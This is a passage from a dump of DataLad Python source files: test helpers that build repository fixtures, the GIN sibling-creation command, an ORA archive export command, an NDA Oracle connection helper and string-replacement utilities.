v.get('state', None) == state)\n eq_(state_files, oktobefound,\n 'unexpected content of state \"%s\": %r != %r'\n % (state, state_files, oktobefound))\n\n\ndef get_convoluted_situation(path, repocls=AnnexRepo):\n from datalad.api import create\n ckwa = dict(result_renderer='disabled')\n\n #if 'APPVEYOR' in os.environ:\n # # issue only happens on appveyor, Python itself implodes\n # # cannot be reproduced on a real windows box\n # pytest.skip(\n # 'get_convoluted_situation() causes appveyor to crash, '\n # 'reason unknown')\n repo = repocls(path, create=True)\n # use create(force) to get an ID and config into the empty repo\n # Pass explicit `annex` to ensure that GitRepo does get .noannex\n ds = Dataset(path).create(force=True, annex=repocls is AnnexRepo, **ckwa)\n # base content\n create_tree(\n ds.path,\n {\n '.gitignore': '*.ignored',\n 'subdir': {\n 'file_clean': 'file_clean',\n 'file_deleted': 'file_deleted',\n 'file_modified': 'file_clean',\n },\n 'subdir-only-ignored': {\n '1.ignored': '',\n },\n 'file_clean': 'file_clean',\n 'file_deleted': 'file_deleted',\n 'file_staged_deleted': 'file_staged_deleted',\n 'file_modified': 'file_clean',\n }\n )\n if isinstance(ds.repo, AnnexRepo):\n create_tree(\n ds.path,\n {\n 'subdir': {\n 'file_dropped_clean': 'file_dropped_clean',\n },\n 'file_dropped_clean': 'file_dropped_clean',\n }\n )\n ds.save(**ckwa)\n if isinstance(ds.repo, AnnexRepo):\n # some files straight in git\n create_tree(\n ds.path,\n {\n 'subdir': {\n 'file_ingit_clean': 'file_ingit_clean',\n 'file_ingit_modified': 'file_ingit_clean',\n },\n 'file_ingit_clean': 'file_ingit_clean',\n 'file_ingit_modified': 'file_ingit_clean',\n }\n )\n ds.save(to_git=True, **ckwa)\n ds.drop([\n 'file_dropped_clean',\n opj('subdir', 'file_dropped_clean')],\n reckless='kill', **ckwa)\n # clean and proper subdatasets\n ds.create('subds_clean', **ckwa)\n ds.create(opj('subdir', 'subds_clean'), **ckwa)\n ds.create('subds_unavailable_clean', **ckwa)\n ds.create(opj('subdir', 'subds_unavailable_clean'), **ckwa)\n # uninstall some subdatasets (still clean)\n ds.drop([\n 'subds_unavailable_clean',\n opj('subdir', 'subds_unavailable_clean')],\n what='all', reckless='kill', recursive=True, **ckwa)\n assert_repo_status(ds.path)\n # make a dirty subdataset\n ds.create('subds_modified', **ckwa)\n ds.create(opj('subds_modified', 'someds'), **ckwa)\n ds.create(opj('subds_modified', 'someds', 'dirtyds'), **ckwa)\n # make a subdataset with additional commits\n ds.create(opj('subdir', 'subds_modified'), **ckwa)\n pdspath = opj(ds.path, 'subdir', 'subds_modified', 'progressedds')\n ds.create(pdspath, **ckwa)\n create_tree(\n pdspath,\n {'file_clean': 'file_ingit_clean'}\n )\n Dataset(pdspath).save(**ckwa)\n assert_repo_status(pdspath)\n # staged subds, and files\n create(opj(ds.path, 'subds_added'), **ckwa)\n # use internal helper to get subdataset into an 'added' state\n # that would not happen in standard datalad workflows\n list(ds.repo._save_add_submodules([ds.pathobj / 'subds_added']))\n create(opj(ds.path, 'subdir', 'subds_added'), **ckwa)\n list(ds.repo._save_add_submodules([ds.pathobj / 'subdir' / 'subds_added']))\n # some more untracked files\n create_tree(\n ds.path,\n {\n 'subdir': {\n 'file_untracked': 'file_untracked',\n 'file_added': 'file_added',\n },\n 'file_untracked': 'file_untracked',\n 'file_added': 'file_added',\n 'dir_untracked': {\n 'file_untracked': 'file_untracked',\n },\n 'subds_modified': {\n 'someds': {\n \"dirtyds\": {\n 'file_untracked': 'file_untracked',\n },\n },\n },\n }\n )\n ds.repo.add(['file_added', opj('subdir', 'file_added')])\n # untracked subdatasets\n create(opj(ds.path, 'subds_untracked'), **ckwa)\n create(opj(ds.path, 'subdir', 'subds_untracked'), **ckwa)\n # deleted files\n os.remove(opj(ds.path, 'file_deleted'))\n os.remove(opj(ds.path, 'subdir', 'file_deleted'))\n # staged deletion\n ds.repo.remove('file_staged_deleted')\n # modified files\n if isinstance(ds.repo, AnnexRepo):\n ds.repo.unlock(['file_modified', opj('subdir', 'file_modified')])\n create_tree(\n ds.path,\n {\n 'subdir': {\n 'file_ingit_modified': 'file_ingit_modified',\n },\n 'file_ingit_modified': 'file_ingit_modified',\n }\n )\n create_tree(\n ds.path,\n {\n 'subdir': {\n 'file_modified': 'file_modified',\n },\n 'file_modified': 'file_modified',\n }\n )\n return ds\n\n\ndef get_deeply_nested_structure(path):\n \"\"\" Here is what this does (assuming UNIX, locked):\n | .\n | ├── directory_untracked\n | │ └── link2dir -> ../subdir\n | ├── OBSCURE_FILENAME_file_modified\n | ├── link2dir -> subdir\n | ├── link2subdsdir -> subds_modified/subdir\n | ├── link2subdsroot -> subds_modified\n | ├── subdir\n | │ ├── annexed_file.txt -> ../.git/annex/objects/...\n | │ ├── file_modified\n | │ ├── git_file.txt\n | │ └── link2annex_files.txt -> annexed_file.txt\n | └── subds_modified\n | ├── link2superdsdir -> ../subdir\n | ├── subdir\n | │ └── annexed_file.txt -> ../.git/annex/objects/...\n | └── subds_lvl1_modified\n | └── OBSCURE_FILENAME_directory_untracked\n | └── untracked_file\n\n When a system has no symlink support, the link2... components are not\n included.\n \"\"\"\n ds = Dataset(path).create()\n (ds.pathobj / 'subdir').mkdir()\n (ds.pathobj / 'subdir' / 'annexed_file.txt').write_text(u'dummy')\n ds.save()\n (ds.pathobj / 'subdir' / 'git_file.txt').write_text(u'dummy')\n ds.save(to_git=True)\n # a subtree of datasets\n subds = ds.create('subds_modified')\n # another dataset, plus an additional dir in it\n ds.create(opj('subds_modified', 'subds_lvl1_modified'))\n create_tree(\n ds.path,\n {\n 'subdir': {\n 'file_modified': 'file_modified',\n },\n OBSCURE_FILENAME + u'file_modified_': 'file_modified',\n }\n )\n create_tree(\n str(ds.pathobj / 'subds_modified' / 'subds_lvl1_modified'),\n {OBSCURE_FILENAME + u'_directory_untracked': {\"untracked_file\": \"\"}}\n )\n (ut.Path(subds.path) / 'subdir').mkdir()\n (ut.Path(subds.path) / 'subdir' / 'annexed_file.txt').write_text(u'dummy')\n subds.save()\n (ds.pathobj / 'directory_untracked').mkdir()\n\n if not has_symlink_capability():\n return ds\n\n # symlink farm #1\n # symlink to annexed file\n (ds.pathobj / 'subdir' / 'link2annex_files.txt').symlink_to(\n 'annexed_file.txt')\n # symlink to directory within the dataset\n (ds.pathobj / 'link2dir').symlink_to('subdir')\n # upwards pointing symlink to directory within the same dataset\n (ds.pathobj / 'directory_untracked' / 'link2dir').symlink_to(\n opj('..', 'subdir'))\n # symlink pointing to a subdataset mount in the same dataset\n (ds.pathobj / 'link2subdsroot').symlink_to('subds_modified')\n # symlink to a dir in a subdataset (across dataset boundaries)\n (ds.pathobj / 'link2subdsdir').symlink_to(\n opj('subds_modified', 'subdir'))\n # symlink to a dir in a superdataset (across dataset boundaries)\n (ut.Path(subds.path) / 'link2superdsdir').symlink_to(\n opj('..', 'subdir'))\n return ds\n\n\ndef maybe_adjust_repo(repo):\n \"\"\"Put repo into an adjusted branch if it is not already.\n \"\"\"\n if not repo.is_managed_branch():\n repo.call_annex([\"upgrade\"])\n repo.config.reload(force=True)\n repo.adjust()\n\n\n@with_tempfile\n@with_tempfile\ndef has_symlink_capability(p1, p2):\n\n path = ut.Path(p1)\n target = ut.Path(p2)\n return utils.check_symlink_capability(path, target)\n\n\ndef skip_wo_symlink_capability(func):\n \"\"\"Skip test when environment does not support symlinks\n\n Perform a behavioral test instead of top-down logic, as on\n windows this could be on or off on a case-by-case basis.\n \"\"\"\n @wraps(func)\n @attr('skip_wo_symlink_capability')\n def _wrap_skip_wo_symlink_capability(*args, **kwargs):\n if not has_symlink_capability():\n pytest.skip(\"no symlink capabilities\")\n return func(*args, **kwargs)\n return _wrap_skip_wo_symlink_capability\n\n\n_TESTS_ADJUSTED_TMPDIR = None\n\n\ndef skip_if_adjusted_branch(func):\n \"\"\"Skip test if adjusted branch is used by default on TMPDIR file system.\n \"\"\"\n @wraps(func)\n @attr('skip_if_adjusted_branch')\n def _wrap_skip_if_adjusted_branch(*args, **kwargs):\n global _TESTS_ADJUSTED_TMPDIR\n if _TESTS_ADJUSTED_TMPDIR is None:\n @with_tempfile\n def _check(path):\n ds = Dataset(path).create(force=True)\n return ds.repo.is_managed_branch()\n _TESTS_ADJUSTED_TMPDIR = _check()\n\n if _TESTS_ADJUSTED_TMPDIR:\n pytest.skip(\"Test incompatible with adjusted branch default\")\n return func(*args, **kwargs)\n return _wrap_skip_if_adjusted_branch\n\n\ndef get_ssh_port(host):\n \"\"\"Get port of `host` in ssh_config.\n\n Our tests depend on the host being defined in ssh_config, including its\n port. This method can be used by tests that want to check handling of an\n explicitly specified\n\n Note that if `host` does not match a host in ssh_config, the default value\n of 22 is returned.\n\n Skips test if port cannot be found.\n\n Parameters\n ----------\n host : str\n\n Returns\n -------\n port (int)\n \"\"\"\n out = ''\n runner = WitlessRunner()\n try:\n res = runner.run([\"ssh\", \"-G\", host], protocol=StdOutErrCapture)\n out = res[\"stdout\"]\n err = res[\"stderr\"]\n except Exception as exc:\n err = str(exc)\n\n port = None\n for line in out.splitlines():\n if line.startswith(\"port \"):\n try:\n port = int(line.split()[1])\n except Exception as exc:\n err = str(exc)\n break\n\n if port is None:\n pytest.skip(\"port for {} could not be determined: {}\"\n .format(host, err))\n return port\n\n\n#\n# Context Managers\n#\n\n\ndef patch_config(vars):\n \"\"\"Patch our config with custom settings. Returns mock.patch cm\n\n Only the merged configuration from all sources (global, local, dataset)\n will be patched. Source-constrained patches (e.g. only committed dataset\n configuration) are not supported.\n \"\"\"\n return patch.dict(dl_cfg._merged_store, vars)\n\n\n@contextmanager\ndef set_date(timestamp):\n \"\"\"Temporarily override environment variables for git/git-annex dates.\n\n Parameters\n ----------\n timestamp : int\n Unix timestamp.\n \"\"\"\n git_ts = \"@{} +0000\".format(timestamp)\n with patch.dict(\"os.environ\",\n {\"GIT_COMMITTER_DATE\": git_ts,\n \"GIT_AUTHOR_DATE\": git_ts,\n \"GIT_ANNEX_VECTOR_CLOCK\": str(timestamp),\n \"DATALAD_FAKE__DATES\": \"0\"}):\n yield\n\n\n@contextmanager\ndef set_annex_version(version):\n \"\"\"Override the git-annex version.\n\n This temporarily masks the git-annex version present in external_versions\n and make AnnexRepo forget its cached version information.\n \"\"\"\n from datalad.support.annexrepo import AnnexRepo\n ar_vers = AnnexRepo.git_annex_version\n with patch.dict(\n \"datalad.support.annexrepo.external_versions._versions\",\n {\"cmd:annex\": version}):\n try:\n AnnexRepo.git_annex_version = None\n yield\n finally:\n AnnexRepo.git_annex_version = ar_vers\n\n#\n# Test tags\n#\n# To be explicit, and not \"loose\" some tests due to typos, decided to make\n# explicit decorators for common types\n\n\ndef integration(f):\n \"\"\"Mark test as an \"integration\" test which generally is not needed to be run\n \n Generally tend to be slower.\n Should be used in combination with @slow and @turtle if that is the case.\n \"\"\"\n return attr('integration')(f)\n\n\ndef slow(f):\n \"\"\"Mark test as a slow, although not necessarily integration or usecase test\n\n Rule of thumb cut-off to mark as slow is 10 sec\n \"\"\"\n return attr('slow')(f)\n\n\ndef turtle(f):\n \"\"\"Mark test as very slow, meaning to not run it on Travis due to its\n time limit\n\n Rule of thumb cut-off to mark as turtle is 2 minutes\n \"\"\"\n return attr('turtle')(f)\n\n\ndef usecase(f):\n \"\"\"Mark test as a usecase user ran into and which (typically) caused bug report\n to be filed/troubleshooted\n\n Should be used in combination with @slow and @turtle if slow.\n \"\"\"\n return attr('usecase')(f)\n" }, { "alpha_fraction": 0.581498384475708, "alphanum_fraction": 0.5830217599868774, "avg_line_length": 40.5, "blob_id": "e710e2b29327ca299bd54483f402c1ca61f230c2", "content_id": "6cf73b49d223fb727367ff568225eff458afa406", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7221, "license_type": "permissive", "max_line_length": 88, "num_lines": 174, "path": "/datalad/distributed/create_sibling_gin.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"High-level interface for creating a publication target on a GIN instance\n\"\"\"\n\nimport logging\n\nfrom datalad.distributed.create_sibling_ghlike import _create_sibling\nfrom datalad.distributed.create_sibling_gogs import _GOGS\nfrom datalad.distribution.dataset import (\n datasetmethod,\n Dataset,\n)\nfrom datalad.interface.base import (\n Interface,\n build_doc,\n eval_results,\n)\nfrom datalad.support.annexrepo import AnnexRepo\n\n\nlgr = logging.getLogger('datalad.distributed.create_sibling_gin')\n\n\nclass _GIN(_GOGS):\n \"\"\"Customizations for GIN as a GH-like platform\n \"\"\"\n name = 'gin'\n fullname = 'GIN'\n response_code_unauthorized = 401\n\n def normalize_repo_properties(self, response):\n \"\"\"Normalize the essential response properties for the result record\n \"\"\"\n return dict(\n reponame=response.get('name'),\n private=response.get('private'),\n # GIN reports the SSH URL as 'clone_url', but we need\n # a HTML URL (without .git suffix) for setting up a\n # type-git special remote (if desired)\n clone_url=response.get('html_url'),\n ssh_url=response.get('ssh_url'),\n html_url=response.get('html_url'),\n )\n\n\n@build_doc\nclass CreateSiblingGin(Interface):\n \"\"\"Create a dataset sibling on a GIN site (with content hosting)\n\n GIN (G-Node infrastructure) is a free data management system. It is a\n GitHub-like, web-based repository store and provides fine-grained access\n control to shared data. GIN is built on Git and git-annex, and can natively\n host DataLad datasets, including their data content!\n\n This command uses the main GIN instance at https://gin.g-node.org as the\n default target, but other deployments can be used via the 'api'\n parameter.\n\n An SSH key, properly registered at the GIN instance, is required for data\n upload via DataLad. Data download from public projects is also possible via\n anonymous HTTP.\n\n In order to be able to use this command, a personal access token has to be\n generated on the platform (Account->Your Settings->Applications->Generate\n New Token).\n\n This command can be configured with\n \"datalad.create-sibling-ghlike.extra-remote-settings.NETLOC.KEY=VALUE\" in\n order to add any local KEY = VALUE configuration to the created sibling in\n the local `.git/config` file. NETLOC is the domain of the Gin instance to\n apply the configuration for.\n This leads to a behavior that is equivalent to calling datalad's\n ``siblings('configure', ...)``||``siblings configure`` command with the\n respective KEY-VALUE pair after creating the sibling.\n The configuration, like any other, could be set at user- or system level, so\n users do not need to add this configuration to every sibling created with\n the service at NETLOC themselves.\n\n .. versionadded:: 0.16\n \"\"\"\n\n _examples_ = [\n dict(text=\"Create a repo 'myrepo' on GIN and register it as sibling \"\n \"'mygin'\",\n code_py=\"create_sibling_gin('myrepo', name='mygin', dataset='.')\",\n code_cmd=\"datalad create-sibling-gin myrepo -s mygin\"),\n dict(text=\"Create private repos with name(-prefix) 'myrepo' on GIN \"\n \"for a dataset and all its present subdatasets\",\n code_py=\"create_sibling_gin('myrepo', dataset='.', \"\n \"recursive=True, private=True)\",\n code_cmd=\"datalad create-sibling-gin myrepo -r --private\"),\n dict(text=\"Create a sibling repo on GIN, and register it as a \"\n \"common data source in the dataset that is available \"\n \"regardless of whether the dataset was directly cloned \"\n \"from GIN\",\n code_py=\"\"\"\\\n > ds = Dataset('.')\n > ds.create_sibling_gin('myrepo', name='gin')\n # first push creates git-annex branch remotely and obtains annex UUID\n > ds.push(to='gin')\n > ds.siblings('configure', name='gin', as_common_datasrc='gin-storage')\n # announce availability (redo for other siblings)\n > ds.push(to='gin')\n \"\"\",\n code_cmd=\"\"\"\\\n % datalad create-sibling-gin myrepo -s gin\n # first push creates git-annex branch remotely and obtains annex UUID\n % datalad push --to gin\n % datalad siblings configure -s gin --as-common-datasrc gin-storage\n # announce availability (redo for other siblings)\n % datalad push --to gin\n \"\"\",\n ),\n ]\n\n _params_ = _GIN.create_sibling_params\n _params_['api']._doc = \"\"\"\\\n URL of the GIN instance without an 'api/<version>' suffix\"\"\"\n\n @staticmethod\n @datasetmethod(name='create_sibling_gin')\n @eval_results\n def __call__(\n reponame,\n *,\n dataset=None,\n recursive=False,\n recursion_limit=None,\n name='gin',\n existing='error',\n api='https://gin.g-node.org',\n credential=None,\n access_protocol='https-ssh',\n publish_depends=None,\n private=False,\n description=None,\n dry_run=False):\n\n for res in _create_sibling(\n platform=_GIN(api, credential, require_token=not dry_run),\n reponame=reponame,\n dataset=dataset,\n recursive=recursive,\n recursion_limit=recursion_limit,\n name=name,\n existing=existing,\n access_protocol=access_protocol,\n publish_depends=publish_depends,\n private=private,\n description=description,\n dry_run=dry_run):\n if res.get('action') == 'configure-sibling' \\\n and res.get('annex-ignore') in ('true', True):\n # when we see that git-annex had disabled access to GIN\n # we will revert it for any dataset with an annex.\n # git-annex's conclusion might solely be based on the\n # fact that it tested prior the first push (failed to\n # obtain a git-annex branch with a UUID) and concluded\n # that there can never be an annex.\n # however, we know for sure that GIN can do it, so we\n # force this to enable correct subsequent data transfer\n ds = Dataset(res['path'])\n if isinstance(ds.repo, AnnexRepo):\n ds.config.set(f'remote.{name}.annex-ignore', 'false',\n scope='local')\n res['annex-ignore'] = 'false'\n yield res\n" }, { "alpha_fraction": 0.528478741645813, "alphanum_fraction": 0.5322896242141724, "avg_line_length": 34.30545425415039, "blob_id": "13b933a15cfab354ac33edb949f7fd1028415e40", "content_id": "b4aefebcf838ee9457e3eb16235c23f8f397857a", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 9709, "license_type": "permissive", "max_line_length": 106, "num_lines": 275, "path": "/datalad/distributed/export_archive_ora.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Export an archive of a local annex object store, suitable for an ORA remote\"\"\"\n\n__docformat__ = 'restructuredtext'\n\n\nimport logging\nimport os\nimport os.path as op\nimport shutil\nimport subprocess\nfrom argparse import REMAINDER\n\nfrom datalad.utils import (\n ensure_list,\n rmtree,\n)\nfrom datalad.interface.base import (\n Interface,\n build_doc,\n eval_results,\n)\nfrom datalad.interface.results import (\n get_status_dict,\n)\nfrom datalad.support.param import Parameter\nfrom datalad.support.constraints import (\n EnsureChoice,\n EnsureNone,\n EnsureStr,\n)\nfrom datalad.support.exceptions import CapturedException\nfrom datalad.distribution.dataset import (\n EnsureDataset,\n datasetmethod,\n require_dataset,\n resolve_path,\n)\nfrom datalad.log import log_progress\n\nlgr = logging.getLogger('datalad.customremotes.export_archive_ora')\n\n\n@build_doc\nclass ExportArchiveORA(Interface):\n \"\"\"Export an archive of a local annex object store for the ORA remote.\n\n Keys in the local annex object store are reorganized in a temporary\n directory (using links to avoid storage duplication) to use the\n 'hashdirlower' setup used by git-annex for bare repositories and\n the directory-type special remote. This alternative object store is\n then moved into a 7zip archive that is suitable for use in a\n ORA remote dataset store. Placing such an archive into::\n\n <dataset location>/archives/archive.7z\n\n Enables the ORA special remote to locate and retrieve all keys contained\n in the archive.\n \"\"\"\n _params_ = dict(\n dataset=Parameter(\n args=(\"-d\", \"--dataset\"),\n doc=\"\"\"specify the dataset to process. If\n no dataset is given, an attempt is made to identify the dataset\n based on the current working directory\"\"\",\n constraints=EnsureDataset() | EnsureNone()),\n target=Parameter(\n args=(\"target\",),\n metavar=\"TARGET\",\n doc=\"\"\"if an existing directory, an 'archive.7z' is placed into\n it, otherwise this is the path to the target archive\"\"\",\n constraints=EnsureStr() | EnsureNone()),\n remote=Parameter(\n args=(\"--for\",),\n dest=\"remote\",\n metavar='LABEL',\n doc=\"\"\"name of the target sibling, wanted/preferred settings\n will be used to filter the files added to the archives\"\"\",\n constraints=EnsureStr() | EnsureNone()),\n annex_wanted=Parameter(\n args=(\"--annex-wanted\",),\n metavar=\"FILTERS\",\n doc=\"\"\"git-annex-preferred-content expression for\n git-annex find to filter files. Should start with\n 'or' or 'and' when used in combination with `--for`\"\"\"),\n froms=Parameter(\n args=(\"--from\",),\n dest=\"froms\",\n metavar=\"FROM\",\n nargs=\"+\",\n doc=\"\"\"one or multiple tree-ish from which to select files\"\"\"),\n opts=Parameter(\n args=(\"opts\",),\n nargs=REMAINDER,\n metavar=\"...\",\n doc=\"\"\"list of options for 7z to replace the default '-mx0' to\n generate an uncompressed archive\"\"\"),\n missing_content=Parameter(\n args=(\"--missing-content\",),\n doc=\"\"\"By default, any discovered file with missing content will\n result in an error and the export is aborted. Setting this to\n 'continue' will issue warnings instead of failing on error. The\n value 'ignore' will only inform about problem at the 'debug' log\n level. The latter two can be helpful when generating a TAR archive\n from a dataset where some file content is not available\n locally.\"\"\",\n constraints=EnsureChoice(\"error\", \"continue\", \"ignore\")),\n )\n\n @staticmethod\n @datasetmethod(name='export_archive_ora')\n @eval_results\n def __call__(\n target,\n opts=None,\n *, # opts is positional but optional in CLI\n dataset=None,\n remote=None,\n annex_wanted=None,\n froms=None,\n missing_content='error',):\n # only non-bare repos have hashdirmixed, so require one\n ds = require_dataset(\n dataset, check_installed=True, purpose='export to ORA archive')\n ds_repo = ds.repo\n\n annex_objs = ds_repo.dot_git / 'annex' / 'objects'\n\n archive = resolve_path(target, dataset)\n if archive.is_dir():\n archive = archive / 'archive.7z'\n else:\n archive.parent.mkdir(exist_ok=True, parents=True)\n\n froms = ensure_list(froms)\n\n if not opts:\n # uncompressed by default\n opts = ['-mx0']\n\n res_kwargs = dict(\n action=\"export-archive-ora\",\n logger=lgr,\n )\n\n if not annex_objs.is_dir():\n yield get_status_dict(\n ds=ds,\n status='notneeded',\n message='no annex keys present',\n **res_kwargs,\n )\n return\n\n exportdir = ds_repo.dot_git / 'datalad' / 'tmp' / 'ora_archive'\n if exportdir.exists():\n yield get_status_dict(\n ds=ds,\n status='error',\n message=(\n 'export directory already exists, please remove first: %s',\n str(exportdir)),\n **res_kwargs,\n )\n return\n\n def expr_to_opts(expr):\n opts = []\n expr = expr.replace('(', ' ( ').replace(')', ' ) ')\n for sub_expr in expr.split(' '):\n if len(sub_expr):\n if sub_expr in '()':\n opts.append(f\"-{sub_expr}\")\n else:\n opts.append(f\"--{sub_expr}\")\n return opts\n\n find_filters = []\n if remote:\n find_filters = ['-('] + expr_to_opts(ds_repo.get_preferred_content('wanted', remote)) + ['-)']\n if annex_wanted:\n find_filters.extend(expr_to_opts(annex_wanted))\n # git-annex find results need to be uniqued with set, as git-annex find\n # will return duplicates if multiple symlinks point to the same key.\n #\n # TODO: use --json which was already added, checked with 10.20230407+git131-gb90c2156a6\n if froms:\n keypaths = set([\n annex_objs.joinpath(k) for treeish in froms for k in ds_repo.call_annex_items_([\n 'find', *find_filters, f\"--branch={treeish}\",\n \"--format=${hashdirmixed}${key}/${key}\\\\n\"])\n ])\n else:\n keypaths = set(annex_objs.joinpath(k) for k in ds_repo.call_annex_items_([\n 'find', *find_filters,\n \"--format=${hashdirmixed}${key}/${key}\\\\n\"\n ]))\n\n log_progress(\n lgr.info,\n 'oraarchiveexport',\n 'Start ORA archive export %s', ds,\n total=len(keypaths),\n label='ORA archive export',\n unit=' Keys',\n )\n\n if missing_content == 'continue':\n missing_file_lgr_func = lgr.warning\n elif missing_content == 'ignore':\n missing_file_lgr_func = lgr.debug\n\n link_fx = os.link\n for keypath in keypaths:\n key = keypath.name\n hashdir = op.join(keypath.parts[-4], keypath.parts[-3])\n log_progress(\n lgr.info,\n 'oraarchiveexport',\n 'Export key %s to %s', key, hashdir,\n update=1,\n increment=True)\n keydir = exportdir / hashdir / key\n keydir.mkdir(parents=True, exist_ok=True)\n try:\n link_fx(str(keypath), str(keydir / key))\n except FileNotFoundError as e:\n if missing_content == 'error':\n raise IOError('Key %s has no content available' % keypath)\n missing_file_lgr_func(\n 'Key %s has no content available',\n str(keypath))\n except OSError:\n lgr.warning(\n 'No hard links supported at %s, will copy files instead',\n str(keypath))\n # no hard links supported\n # switch function after first error\n link_fx = shutil.copyfile\n link_fx(str(keypath), str(keydir / key))\n\n log_progress(\n lgr.info,\n 'oraarchiveexport',\n 'Finished RIA archive export from %s', ds\n )\n try:\n subprocess.run(\n ['7z', 'u', str(archive), '.'] + opts,\n cwd=str(exportdir),\n )\n yield get_status_dict(\n path=str(archive),\n type='file',\n status='ok',\n **res_kwargs)\n except Exception as e:\n ce = CapturedException(e)\n yield get_status_dict(\n path=str(archive),\n type='file',\n status='error',\n message=('7z failed: %s', ce),\n exception=ce,\n **res_kwargs)\n return\n finally:\n rmtree(str(exportdir))\n" }, { "alpha_fraction": 0.6035451889038086, "alphanum_fraction": 0.6182447075843811, "avg_line_length": 32.0428581237793, "blob_id": "dc39918489dbad2abe63bfc60e4b2d8949a6a378", "content_id": "f23c1459c4ddbefd7b3afb124dfaf974a47a87fb", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2313, "license_type": "permissive", "max_line_length": 89, "num_lines": 70, "path": "/datalad/support/nda_.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Various supporting utilities to interface with NIMH Data Archive (NDA)\n\nPrimary \"ugliness\" is the requirement of the cx_Oracle (itself is open, but relies\non closed SDK/libraries) module to access miNDAR database.\n\"\"\"\n\n__docformat__ = 'restructuredtext'\n\nfrom datalad import cfg\nfrom datalad.downloaders.providers import Providers\n\nfrom logging import getLogger\nlgr = getLogger('datalad.support.nda')\n\nDEFAULT_SERVER = 'mindarvpc.cqahbwk3l1mb.us-east-1.rds.amazonaws.com'\n\nfrom collections import namedtuple\n\n# Could be extracted from the dictionary\n# https://ndar.nih.gov/api/datadictionary/v2/datastructure/image03\n# where type is File\nimage03_file_fields = [\n 'image_file',\n 'data_file2'\n]\nimage03_fields = [\n 'collection_id',\n 'submission_id',\n 'dataset_id',\n 'experiment_id',\n # 'subjectkey',\n # 'src_subject_id',\n] + image03_file_fields\n\nimage03_Record = namedtuple('image03_Record', image03_fields)\n\n\ndef get_oracle_db(\n dbserver=None,\n port=1521,\n sid='ORCL',\n credential=None):\n dbserver = dbserver or cfg.obtain('datalad.externals.nda.dbserver',\n default=DEFAULT_SERVER)\n # This specific username has access to the 'Image' selection of NDA as of about today\n #username = username \\\n # or cfg.get('externals:nda', 'username',\n # default='halchenkoy_103924')\n if not credential:\n providers = Providers.from_config_files()\n credential = providers.get_provider(DEFAULT_SERVER).credential\n\n if not isinstance(credential, dict):\n credential = credential()\n\n import cx_Oracle # you must have the beast if you want to access the dark side\n dsnStr = cx_Oracle.makedsn(dbserver, port, sid)\n db = cx_Oracle.connect(user=credential['user'],\n password=credential['password'],\n dsn=dsnStr)\n\n return db\n" }, { "alpha_fraction": 0.5292066335678101, "alphanum_fraction": 0.5366172790527344, "avg_line_length": 32.246376037597656, "blob_id": "5a1df94f35cbd8701cd2906296a5c5b1501e4f99", "content_id": "47269f85cde12feca260813a1f5f84f06730736d", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2294, "license_type": "permissive", "max_line_length": 118, "num_lines": 69, "path": "/datalad/support/strings.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; indent-tabs-mode: nil -*-\n# vi: set ft=python sts=4 ts=4 sw=4 et:\n### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##g\n\"\"\"Variety of helpers to deal with strings\"\"\"\n\nfrom __future__ import annotations\n\n__docformat__ = 'restructuredtext'\nimport re\nfrom typing import AnyStr\n\n\ndef get_replacement_dict(rules: AnyStr | list[AnyStr | list[AnyStr] | tuple[AnyStr, AnyStr]]) -> dict[AnyStr, AnyStr]:\n \"\"\"Given a string with replacement rules, produces a dict of from: to\"\"\"\n\n if isinstance(rules, (bytes, str)):\n rules = [rules]\n\n pairs = dict()\n for rule in rules:\n if isinstance(rule, (list, tuple)):\n if len(rule) == 2:\n pairs[rule[0]] = rule[1]\n else:\n raise ValueError(\"Got a rule %s which is not a string or a pair of values (from, to)\"\n % repr(rule))\n elif len(rule) <= 2:\n raise ValueError(\"\")\n else:\n rule_split = rule[1:].split(rule[0:1])\n if len(rule_split) != 2:\n raise ValueError(\n \"Rename string must be of format '/pat1/replacement', \"\n \"where / is an arbitrary character to decide replacement. \"\n \"Got %r when trying to separate %r\" % (rule_split, rule)\n )\n pairs[rule_split[0]] = rule_split[1]\n return pairs\n\n\ndef apply_replacement_rules(rules: AnyStr | list[AnyStr | list[AnyStr] | tuple[AnyStr, AnyStr]], s: AnyStr) -> AnyStr:\n r\"\"\"Apply replacement rules specified as a single string\n\n Examples\n --------\n\n >>> apply_replacement_rules(r'/my_(.*)\\.dat/your_\\1.dat.gz', 'd/my_pony.dat')\n 'd/your_pony.dat.gz'\n\n Parameters\n ----------\n rules : str, list of str\n Rules of the format '/pat1/replacement', where / is an 